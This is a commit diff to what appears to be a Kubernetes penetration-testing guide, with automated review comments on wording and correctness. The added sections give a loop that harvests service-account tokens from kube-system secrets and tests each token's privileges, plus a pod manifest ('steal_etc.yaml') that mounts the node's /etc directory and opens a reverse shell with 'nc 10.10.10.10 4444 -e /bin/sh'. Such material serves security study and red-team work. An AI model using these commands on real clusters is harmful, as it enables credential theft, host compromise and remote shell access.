GitBook: [master] 454 pages modified
parent f7b6e4a914
commit b486b9fee1
@ -74,7 +74,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
|
|||||||
|
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to add the option `-o json` or `-o yaml`
|
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### Get namespaces
|
### Get namespaces
|
||||||
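Review bot: The reworded hint line drops the `-o json` / `-o yaml` instruction in favour of `describe` rather than offering both, and the two are not equivalent: `describe` prints a human-readable summary, while `-o json` and `-o yaml` return the full object in a form that can be parsed. Suggest keeping both options in the sentence and saying when each applies. While this line is being touched, "commands indicates just how to list" should read "commands only show how to list".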
@ -115,6 +115,12 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
|
|||||||
{% endtab %}
|
{% endtab %}
|
||||||
{% endtabs %}
|
{% endtabs %}
|
||||||
|
|
||||||
|
If you can read secrets you can use the following lines to get the privileges related to each to token:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
|
||||||
|
```
|
||||||
|
|
||||||
### Get Current Privileges
|
### Get Current Privileges
|
||||||
|
|
||||||
{% tabs %}
|
{% tabs %}
|
||||||
|
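Review bot: The added one-liner picks the token out with `cut -d " " -f 7`, which depends on the exact number of padding spaces in the `describe` output and silently yields empty or wrong values if that layout differs; select the value by field name instead of by position, and quote `$token` where it is passed to `--token`. The loop calls `./kubectl` from the current directory while the other commands in this commit use plain `kubectl`, so pick one form. The intro sentence has a typo: "related to each to token" should be "related to each token".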
@ -89,6 +89,40 @@ So just create the malicious pod and expect the secrets in port 6666:
|
|||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28470%29.png)
|
![](../../.gitbook/assets/image%20%28470%29.png)
|
||||||
|
|
||||||
|
## **Pod Creationv2**
|
||||||
|
|
||||||
|
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
|
||||||
|
|
||||||
|
{% code title="steal\_etc.yaml" %}
|
||||||
|
```yaml
|
||||||
|
apiVersion: v1
|
||||||
|
kind: Pod
|
||||||
|
metadata:
|
||||||
|
name: stealetc-pod
|
||||||
|
spec:
|
||||||
|
containers:
|
||||||
|
- name: givemeyouretc
|
||||||
|
image: alpine
|
||||||
|
command: ["/bin/sh"]
|
||||||
|
args: ["-c", "nc 10.10.10.10 4444 -e /bin/sh"]
|
||||||
|
volumeMounts:
|
||||||
|
- mountPath: /mnt
|
||||||
|
name: volume
|
||||||
|
volumes:
|
||||||
|
- name: volume
|
||||||
|
hostPath:
|
||||||
|
path: /etc
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Create the pod with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
kubectl --token $token create -f abuse2.yaml
|
||||||
|
```
|
||||||
|
|
||||||
|
And capturing the reverse shell you can find the `/etc` directory of the node mounted in `/mnt` inside the pod.
|
||||||
|
|
||||||
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
|
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
|
||||||
|
|
||||||
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
|
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
|
||||||
|
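Review bot: The manifest is titled `steal_etc.yaml` but the create command on the added line uses `abuse2.yaml`, so the steps do not match as written; use the same filename in both places. The paragraph says the permission is over kube-system, yet neither the manifest's `metadata` nor the command sets a namespace, so the text should state where the pod is meant to be created. Wording: the heading "Pod Creationv2" needs a space, and "you can also be able to mount" should be "you can also mount".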